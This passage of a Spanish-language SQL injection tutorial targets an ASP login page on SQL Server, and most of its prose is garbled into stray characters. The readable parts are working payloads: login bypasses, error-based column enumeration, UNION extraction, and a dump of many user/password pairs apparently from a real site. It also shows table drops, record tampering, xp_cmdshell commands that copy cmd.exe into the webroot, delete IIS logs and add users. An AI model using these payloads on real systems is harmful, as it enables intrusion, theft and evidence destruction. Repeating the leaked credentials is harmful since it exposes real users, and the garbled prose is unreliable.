  • 13. 2 1 $ % & ' (#)* +! , - . , / % 0 , , 123 % & - & ) " 6 9 * & " " " & " ) " " " ) ) " * " " " ) " " + "& . " " I " + = " " "& + " 9 " . & " ( .J ) " E! * >. . >F ) " " 9 " ." > . " > ) " " " . " " >% " ' "> )4 6 6 6 7 ! 8 ( . " 6 " " 7 " #$% 4 & " * 9 " . " 9 " " "& 9 . " " ; %& 5#!& & " " " 6 ( 9 " < #$% # 6 ' " 9 " ) "& "& .J " 6 ) & " & 4 & . " + ) 4 * & 6 " " * " EH > % " ' ">F # ) & " > 6 " > + = " " " = " * " 6 & " " . 9 " ) ) + = " " " " " 9 & 4 & " " . " . " " " ) "= 8 " " & . " " 6 ) " " 6 " # ) . " " " " ) " * & 1: ) ) " & " " " " * " * " " & " 6 " 6 " " " ) E8" " ) "& ) 6= " "& " ) 6 " + . F 9 ;:,5 * & 6 " " > "> " + J 9 " " " 6 ( " . 9 " ) ! " " 6 " & . " = & " ( . " 7 " " " 9 . * ) " . " " 7 & "= ) 7 * 9 " =
  • 14. 3 $ (! 6) $ (! ) & 3( " " " " " .= "& : 0% ! . " " & # 86 " : 0% & " , " " + * " .= & ! . " " " " D " 9 " 6 " + ) " < " " + * " " " " " " " . *= " " " - & 9 4 4 4 ) " . " 4 " " " " " " " " " ) "& 9 " "& " . " " 6 " * . / = " + " 5 " " " " & ) ) * "& ) . " " + * "& " " ) 6 " " " ! " " " . " . I ) & " 6 " " * " "& " E> L >F * + " 6 " * " ) 6 " H 7 " " + .J " " " " . " #$% = " " " * 9 " " " . " " . ! " 9 + = " " " " " * " ) * ; % 5#!& * " " = " " 9 6 " 9 " " " 6 "& . " # 5 : + !5##G: , " " . . 5#! 9 ) " + 6 #$% ; ) 7 = " " 9 * " " 6 #$% " < " " . " " " 4 " ! 6 " 4 8" " * . < = " ) 6 ) & . *= ---- Extracto ------------------------------------------- <FORM action=ingreso.asp method=post> <TABLE cellSpacing=1 cellPadding=3 width=440 bgColor=#ffffff border=0> <TBODY> <TR bgColor=#ff0066> <TD><B><FONT face="Arial, Helvetica, sans-serif"
  • 15. ? size=2>Nombre</FONT></B></TD> <TD><B><FONT face="Arial, Helvetica, sans-serif" size=2>Clave</FONT></B></TD></TR> <TR bgColor=#ffcccc> <TD><INPUT name=USERNAME> </TD> <TD><INPUT type=password value="" name=PASSWORD> </TD></TR> <TR align=middle bgColor=#ff0066> <TD colSpan=2><INPUT type=submit value=INGRESAR! name=SUBMIT> </TD></TR></TBODY></TABLE><BR><BR></FORM></TD> <TD vAlign=top align=left width=10> </TD> <TD vAlign=top align=left width=140> <TABLE cellSpacing=0 cellPadding=0 width=140 border=0> <TBODY> ---- Extracto ------------------------------------------- ! " 9 * ( = & ; % " "& + " 4 . 5#! E! " " & . " " F 5 ) & " " 9 ) 4 ( . " " & " 9 6 " " " " " "& " " " 9 * #$% " 6 " " ) " ) . 9 + " 6 " " select * from users where username = 'Angel' and password = '338xD' ! " " 9 " " + "" 9 . ) < " ) " " 9 ( " * 9 = 6 ( 6 ) " " ) * " " ) #$% 4 " I :M& 6 " " * = " " + . " " " + " D . " 'or 1=1— Usuario : 'or 1=1-- ! "" L V W A 47 " "& 9 = " . ) + . select * from users where username = ' or 1=1-- and password = ' or 1=1--
  • 16. @ 1 9 " 9 " < " " " >: > 9 " & " " " 6 6 " 6 E " 6 " ) F & . + = " " " " " " " . " " 1 ( , 0 4 Usuario : 'OR''=' Password : 'OR''=' 5 4/ ' ) & " " 6 + 6 4 . " > " ">& " " " > 00 > E, ) / F " #$% ( & " " "& #$% 9 . 9 6 . . + # ) " " 7 " . " 6 " 9 . " < + " & " & " 6 " & " ) "& " . " " & ( " 6 . # . 4 & " " " " " " 9 < " " " )4 6 & .J " * >5 > > > " = + . " Usuario : Admin'-- Password : 'or 1=1-- 8 = & " 9 " " = " " " . select * from users where username = 'Admin'-- and password = ' or 1=1-- # " * "= + " . 4 & ) ) + " . 8 " & " 6 " ) 6 " " " > L > E' " F " " + > 00 > E, ) / F 6 9 " + " < "& " ) "
  • 17. " " > " . "> 6 " ) "& 9 " " " " . ) 4) # $ 7 ! . ! # 5 " " " " " * " < #$% + . & " 6 " ) 9 6 6 . " " ) " * " " " " . 9 " " ' + = " 9 " " & . + & = " * & ) 4 " > < " . > 9 " + * . " + " " " " " " ! " 9 . E' + < " F& " " " "& " " " " " . & . 9 9 " J " " ) " " "& + " 9 " 6 " " " & 4 & " 6 * " " " " " 6 " " " " ) 4 & " 6 " 4 & " + * " " " ) " < 6 . & . " 9 " " " . " " " 6 5 " * " " ) " * " " "& " 6 6 . " " ( " " " 9 D ) "9 " + * " " * " 1 7 ! $ 7 ! . % # " ' ; #$% # 6 & + " 6 " " 6 & " 6 . " " 6 ##$%#8 H8 & " > < > < Q " ) & " ) + > > " " " " ) " " #$% # 6 )Q ) " ) " ) " " * ) ) "& 6 " )4 "& + . ) " " * " 1 ) " " )4 " ) " " " . " 8 4 " " " " " . * .J 8 " " "& " " . * " " " " ) " + 6 " "
  • 18. B . 6 9# + & % " 9 " , . # 6 & . & " " " D " & " 6 " " " " " E' = " 5 F " " E8 " " * 9 " 9 " . ) " = " & 4 " " 6 " ( + ( & F 5 * " " " " " 9 " 6 " " & 9 6 " & " .J ) . 6 9 J * 9 " & . 4 & " " " " 9 = . " " 6 8 6 " " & M " " * " & 6 ) + #$%& = 4 & & 9 4 " " " Usuario : '; drop table usuarios-- Password : # * & " " 6 . " * EH " >8* " ! 6 . " >F & ) ) ) > " "> " & 9 " & .J " * " * " ' & + " " " & 6 " 6 ) ( " " & 6 5"= + & " 9 , # " " " " 9 " . 7 " " ) "& 9 ) " ( & ) = " + 1 $ % % + 67 & 4/ ) . $ : 3( ) & ! #& ! ) ) " * " " " " ( 7 " #$% 4 & " " " ) " 9 ) " " :,-' :%8 ,- 4 " #$% # 6 . ( D " # ) " " 9 & " . " & " " . 7< & " " " E " 9 ) " " ( = & . ) " 6 "& . " ) " 9 & + " " ) " " " * F
  • 19. C " 9 " " " 6 ) " + * 1 8 .1) 8 & " 9 6 ( " 6 " & 6 " " " 6 " ) " " " 9 " 6 ) " "& . " + * & " " * 9 " < " " 4 " " & + " " " 6 " " " " + " 6 ( " ! " " " . 4 & " " " ) " > L > E' # F " " D * " " . Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')'., SQL state 37000 in SQLExecDirect in php/db_odbc.inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.login=''') ODBC Error: 1 (General Error (The ODBC interface cannot return detailed error messages).) Session halted. - & 6 " 9 * " < " :,-' :)6 " " " * #$% % < ) " " " . " E > )Q ) >F 2 ! " * )Q ) & " 9 " 3 8 ) ) " " ( " > " > ? " " " " > . > - & " 9 6 + " 6 " . * 9 + . " " :,-' 8 )Q ) 1 3 % ) 010.8#* - "3.9$ (")-#) :;<< 123
  • 20. ----- Fragmento ----------------------------------------- <?php /* * Session Management for PHP3 * * Copyright (c) 1998-2000 XXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * Modified by XXXXXXXXXXXXXXXXXXXX (XXXXXX@XXXXX.XXX) * * $Id: db_odbc.inc,v 1.3 2000/07/12 18:22:34 kk Exp $ */ class DB_Sql { var $Host = ""; var $Database = ""; var $User = ""; var $Password = ""; var $UseODBCCursor = 0; var $Link_ID = 0; var $Query_ID = 0; var $Record = array(); var $Row = 0; var $Errno = 0; var $Error = ""; ----- Fragmento ----------------------------------------- - " " " " >" " > 6 " " 6 " " 6 ) " X " + X! "" " " . & " 9 " ( " " " . " " 6 " " " " * & . " 6 4 * . 9 " * & " "& 9 * 9 9 6 " #$%& A " + 6 & " " . " 6 " " " . " " < 9 " 6 " * " " " ) E8 " " = ) " )Q ) F : ) & * / ! :M& 6 " " 9 + #$% + " * 6 " ) " " ) " "& * . + " " " ) 9 4 * " + . & " 9 4 " " ) " 6 + .
  • 21. 8 " " 6 " " " " ( & " ( 7 " #$% 4 & " " ! " 9 " 6 " " " * & . " 6 4 6 " " & " " 9 " " ) "& J " " ( 9 " " " ) " " ) < 9 6 7 " ;;! " 6 " # " + ) " " ' % E8 M " " B * " + % " ' "F& 9 " " " ) 4 E5 . 6 & " . F " . . = " - " 9 " 6 " " " " 6 " * " 7 " ;;! " )4 6 & " < " "& ( 9 D " 6 " < & " " " 6 < & " . * nc -vv www.objetivo.com 80 < sentencias.txt ' " ' + " * " " ;;! * & ( " ** * E8 " " * # +1 & " 8 9 F& . . " ) )4 6 . " ) " + " D " * " E5 . ) " " " F& " 6 " " 8" * " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 34 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Angel&txtPassword=Angel Y Y Y H . " >! "" >
  • 22. Y * . " Y H . " > " > * . " - & " . 9 " " * !:#; ) " " ** 6 < 9 4 < & " " ) " " " . ! " 9 " " . + " ) 9 " " " " ) " + ) > L > E' " F * & 6 6 " & ) ( " ) " * ) ( 6 * ! " " 6 " " " " " " #$% 9 " " E 6 .& . )+& F 8 )4 6 " " ( > > " " ' " " " " > "> #$%& " * " 6 " * " 9 6 9 #$% E 4 6 < & " 4 :%8 ,-F ) " " " " )" 6 "& " 4 " * 6 " " 6 " " H 6 " " " 4 < 6 " " " * " ( " 7 !:#; 9 " ( " 6= ( " ) 4 6 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 46 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27having+1%3D1--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L 6 . V 00 E8 Z 6 .[ Z2, 00F
  • 23. 2 1 . $ " = 3 )*1( 5*'> ! ) 6 " " " . " " " 6 !:#;& " 9 " " " ) " > "> " " " " ;;! % ) " " ( * " " 9 6 " 6 " ! + 4 ' # Z ] ! + ' Z2- , " ! " Z25 O O 8" [ Z V # . . Z2, & ' Z ' E ! 7 " " Z B F ! 7 " " Z C U + Z28 T Z2' 5 ) ! [ " Z - 0 " 0 ^ - M # " Z?' Q " Q :MK 9 " ( " 4 < & " " " " ( " 6= & + 6 9 " ! " 6 " 6 = 9 " 6= " " " 9 " 6 " 9 " & + 6 " 9 " " " " " ) 8 " nc -vv www.objetivo.com 80 < Injection.txt > result.html - 6 " 9 " 9 . " " + > 6 .>& ) " 6 " * " 9 4 " " ! " " " & . " & " 7 * " 9 " " * " ) " " " " + " H " 9 4 " "
  • 24. 3 Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 ! * KK " " " & " )" 6 9 " 4 " & 6 :,-' #$% # 6 " 6 6 ) ) ) " " ( * " " . . E # 5 :#F& "= ) 7 " E " ,F 5 9 " ) ) & " * " = & " 6 6 " " * 4 < + ( " " * " " "& " " " ) # 5 :# H " 9 = " * " 6 !:#; POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 71 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;xxxxxxxxxxx =COUNTRYNAME=Argentina txtUsuario=%27group+by+usuarios.UserID+having+1%3D1-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " H + L. )+ " " " , 6 . V 00 % . 4 6 " = & 6 " " . " Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'USUARIOS.UID' is invalid in the select
  • 25. ? list because it is not contained in an aggregate function and there is no GROUP BY clause. /Login.asp, line 85 6 ( " " " & " 9 " " > 6 .> " 6 ( " >. )+> " ) + " , ) # 5 :#& " " , # . " .= & " " " " " + " " 9 ) # 5 :# ( " > . " > * " " "& " > 6 > " ) " + 8" " = * 'group by usuarios.UserID,usuarios.UID having 1=1-- #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Nombre' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85 * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre having 1=1— #! ! * Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Column USUARIOS.Email' is invalid in the select list because it is not contained in an aggregate function or the GROUP BY clause. /Login.asp, line 85
  • 26. @ * 'group by usuarios.UserID,usuarios.UID,usuarios.Nombre, usuarios.Email having 1=1-- #! ! * HTTP/1.1 100 Continue Server: Microsoft-IIS/4.0 Date: Fri, 14 Feb 2003 20:02:22 GMT HTTP/1.1 302 Object moved Server: Microsoft-IIS/4.0 Date: Fri,14 Feb 2003 20:02:23 GMT Connection: close Location: PaginaPersonal.asp Content-Length: 139 Content-Type: text/html Set-Cookie: xxxxxxxxxx=USEREMAIL=rcesar6%40hotmail%2Ecom&CHATNAME=&US ERFIRSTNAME=roxana&COUNTRYNAME=Argentina; expires=Sun, 16-Mar-2003 05:00:00 GMT;path=/ Cache-control: private Object Moved This object may be found here. :M 9 =& " )" 6 " + ) " . > " " 8 > 8 9 " " 9 & ) " . * ) " . " > > " ( " #8%8'; . E/ " 1 F A=4 " 9 " " !:#; ;;! 1: " & " 9 " " " 6 . " " " " ) " "& 4 6 9 #$% 6 + E8" " L. )+ " " " ,& " " ,& " " 1 ) & " " 8 6 . V 00F , " & " " 9 & * " * " " " " ) & ( " " " . " ' & . " " " " " . " 9 ;:,:# " " ) " " #8%8'; . & " "& 9 + 9 " " " " #8%8'; " + 9 * " " II 6 " 4 < " # 9 " * " " . SELECT campo1,campo2,campo3 FROM nom_tbl WHERE campo1=x AND campo5=y
  • 27. ( 7 E8" " >. )+> + > 6 .>F " ) = " " ) " > >& > > + > 2>& " ) = " < " > ?> E, * " " 9 " . * >#8%8'; _ A : ` a> " = " & " * ) " + " " " 7 F " " " " " " ) ( . " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 297 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27+union+select+b.name%2C1%2C1%2C1+from+sy sobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.name%3 D%27usuarios%27+and+b.name+in+%28select+top+01+b.name+fro m+sysobjects+a%2C+syscolumns+b+where+a.id%3Db.id+and+a.na me%3D%27usuarios%27+order+by+1+desc%29+order+by+1-- &txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y Y H + "L " ) & & & * "+" )4 " & "+" " ) V) VL " "L ) E" ) * "+" )4 " & "+" " ) V) VL " "L )+ " F )+ 00 - 9 " " " III H "& ( " + > "> = ) " 9 " " # * " ( " " . & " " + % . " 1 :1 " . + 9 " " " & " " " " ) " " " #S#:-b8';# + #S#':% 1# " > ,> * 9 " ) " 6 ( " ;:! E8 " " F % " " " ( 1 6 9 " " 6 " #8%8'; 7 " "& "= * 9 ) 6 " "
  • 28. B 4 ;:!& " 9 . " " ;:,:# " " ) )4 6 " !:#; 6 ;:! F % " 9 = " ) " " " . " " " & Ups' union select b.name,1,1,1 from sysobjects a, syscolumns b where a.id=b.id and a.name='usuarios' and b.colorder = 48 -- 7 " & 4 " 4 " + J . " " " E! 4 9 " " " " " ) ( " > >F ! 6 " " " 7 " 4 Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserSubPLUSDate' to a column of data type int. /Login.asp, line 85 :M& 6 " :,-' " " 9 ) ) # 5 :# " > " # )!% #, > % . " & 6 " . ;:! + " . " " " " ) " + " :- .# ! #& + 5 ) & & + " 6 ( 9 " " " . 6 " & ) " " ) " ) + " "& " 9 ) 7 " " 6 . " 9 " " % . " & " " " #$% > 1 :1>& D * ># EF> " # ) " 1 :1 " " " " >) " "> 9 " * . 4 #$%& " 9 " J " * "& " ) " J 6 " ) " " ! 4 & " " J 1 :1& " " " > >& ) " " " " " ) " " ! " * # EF& " ) " 7 " . " "
  • 29. C 5 9 " " . ) " " 6 " " ( " 4 "& & " + ; " " 6 " 4 < + 7 " * 9 . " . " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 82 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu arios--&txtPassword=Angel Y Y Y H 9 6 " >! "" > Y * . " Y H + L " " E ,F& & & * " "00 6 ( "& . 4 " " = 1 6 !:#; " " 6 )4 6 & ) " " " . < Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a nvarchar data type as an argument. /Login.asp, line 85 - " " 6 9 6 :,-' " " ) " " & 4 6 " " E> ,> " 4 F " " ) 9 " I 8 " 9 " " " " 1:& 6 ( " " & " 6 " " 9 = " , ) 9 " " " " " ) ) ( & "= & + )
  • 30. 2 " " 6 "& " ) * " ( " " #$% ) " " ) " E! " " " )4 6 #$%KK& IIF 8 "& " " " " " " & " " " " " " #$% 1 :1& 9 4 " # + " " " & " ) ) " ( & ; !: ,8 ,5;: 9 " " " 9 " . " " ! " " . & 9 " 9 " " " + I :M& < ' " 5 + " < =" >5 6 #$% 4 ` a>& #$% ># > 6 * & 6 " " & #$% " < * " " 4 " 9 " " " " " " " " " " 4 " * 9 " 4 " + > ,> 8" " 4 " 4 6 9 " " 1H5 ' 5 EA " " " " F " 6 #$% " " >9 4 > 7 " 9 . # 1H5 ' 5 - & . " " 6 " 6 7 " . " " " + " " "& " . ) ) " " #$% ! . * & )" 6 " 9 " 6 1 &( ! (! # 5 :# 4 # # " " " # )!% #, " " " . " , " " " ! ) ! * " " " ! * M " " " ! * " " " " ! <# " " " " ! <1 " " " ! M " " " % " # " " " " , " " " , M " " , E1 ) " F " " # " " !G# E' " D F 8 ' 6 & " * * " ( " ) "& " " + " " "& . " " " 6 " < " ! & " > . " D > > . > " E! .J F 9 " & " " "& " " ) " 9 " . " " " ) " ) " " " " ) "& + " " " 6 " " > >& 9 ;:,5 * * 6 " )4 6 & b 1;5 >86 "& , " ) + 8 > . " " " " 4 . " , & " & E% " 9 ) 9 F . . 9 " + " "
  • 31. 2 4; ! * #! ! !< !& ! (! 6 ( #$%& ( " " " . " * ) " " )4 6 & ( . " " 7 " 9 " ) " = (! , 8 .= # . "& >) " > ) " " " . & " " 9 6 ) " " " A=4 " 9 * . " ) * * 4 . " " "" ) " " 6 & ( 7 " " " " > $6 3 / (! 6#; ! % " " " & " ( * #$% . ) " 6 " 1;: 9 " . " . " E% 9 " * 6 " 6 " ( F * * " 6 " " " , + !G# H 6 " " " F + 6 " * 9 ) = 6 !:#; + POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 199 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D %27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3 B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in to+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y
  • 32. 2 H + L < 6 EB F " <VLL " <V <[ [L L[ "[L]L* " " U < " < " < < W -> $6 3 , 8 . ! (! 6#; ! 6 ( " " & " ) " + #8%8'; ) ( 7 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 76 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp-- &txtPassword=Angel Y Y H 9 6 " Y >! "" > * Y . " Y H + "L " <& & & * < 00 ) ( " !:#; * & 6 :,-' 6 6 " " ) " 4 " * . ) " . * * " " " Login de Usuarios Registrados Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14 05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
  • 33. 22 carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2 11095;victor... /Login.asp, line 85 2> $6 3 4! & ! (! 6#; ! 6 ( ) " " " ) " "& ) ( " & " . + , :!& " " " . 4 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 53 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * . " Y H + L] ) < 00 - 6! ! ; " " " " " " " " . & " " " " 6 " " " . 6 ) " " " " "& "& 9 ( 6 " 9 . * & " " 5 " " " " " ) " " 9 " * & . . . " " " ) " " $+6 4 H " 4 9 " " " !:#; ( "" " . " " 6= + " !,5;8
  • 34. 23 POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 103 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2 7+where+uid%3D%27Carla%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L " " " "VL1 6 ! ""L VL' L00 +4 4 4 # & . " * " !:#; & . " + 9 E5 9 " * 9 " " #$% # 6 F . " H + 'delete from usuarios where UID='Usuario'-- 1 4 $ " 1#8 ;& ) " 9 " " 4 & " " 9 & " " " "& " " 6 " 6 " " " " 9 + . " " " ! & " " ) ( . & + 4 " & . " E' " 4 KKKF " = " ) " . 9 = 9 " " ( " 7 & 6 " " " "& + . ( 9 " " " )
  • 35. 2? 5"= " & " 9 < " " " " 1#8 ; " " 9 " ) " & 4 * " + & " . = 9 " " " " ( " !:#; 6= :)6 7< " + . * 9 " + . & " ) " " " " + " " " 6 " " POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 113 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser %27%2C%27MyPassword%27%29--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + L] " " " 6 " EL + " L&L +! "" LF00 % & & ! ! " . " . " ! " ) ( . " 7 " " " #$% 4 " " ( " " " " * " * & ) " 6 " II * 6 1: " " . & " " * " 9 " * #$% # 6 " >8< # ! "> " < " $ # ?4; $ # % " " < " " " & ,%%L" 9 < " " ) " " " " & " " " " 8< " " " " < "& 6 " #0#$%& " " ) * " 5 . " "& #0#$% ) " ) .
  • 36. 2@ " " " < " "& " " & * " ) ) " " " 9 " 5 ) " * " "& " " " " " " " " " " " 9 " + " ( " " " < Q " N Q " " 4 " " " 6 6= #$% > " > " K 6 " ( = " " " " . " 4 " " ;;! POST /Login.asp?validar=2 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, */* Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2 Accept-Language: en-us Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.xxxxxxxxxx.com Content-Length: 90 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA; xxxxxxxxxx=COUNTRYNAME=Argentina txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe +dir+c%3A%27--&txtPassword=Angel Y Y Y H 9 6 " Y >! "" > * Y . " Y H + "L]8N8' " ) < Q " L < L00 :M ) " " " + * ) 9 " 4 & " ) 4 " #5 E 6 " " " ) " ( < Q " F , " * " " )" 6 " " " = " ) " * " 6 > > . 9 " ) " * . " 6 " E8 " " & & & " & F 5 4 & 6 " . " " * " 9 " " = 6 " " < Q " E/ " 1 ) 4 " ) " " = "F
  • 37. 2 ! " EXEC master..xp_cmdshell 'dir c:inetpubwwwroot' ! 6 9 6 EXEC master..xp_cmdshell 'type c:inetpubwwwrootalguna_pagina.asp' ! " ) EXEC master..xp_cmdshell 'copy c:winntsystem32cmd.exe c:inetpubwwwrootchroot.exe' ! ) " EXEC master..xp_cmdshell 'DIR c:winntsystem32logfilesw3svc1' EXEC master..xp_cmdshell 'NET STOP "Servicio de publicación en World Wide Web"' EXEC master..xp_cmdshell 'del c:winntsystem32logfilesw3svc1 filelog.log' EXEC master..xp_cmdshell 'NET START "Servicio de publicación en World Wide Web"' ! 6 " EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path' ! " 6 G " EXEC master..xp_cmdshell 'NET USER username password' :M& " ) . " " >8< # ! ">& " . " " " " >1 8< ">& " " ) 7 ) " & 4 " " " " " # " + " 'exec master..sp_addlogin MyUser, 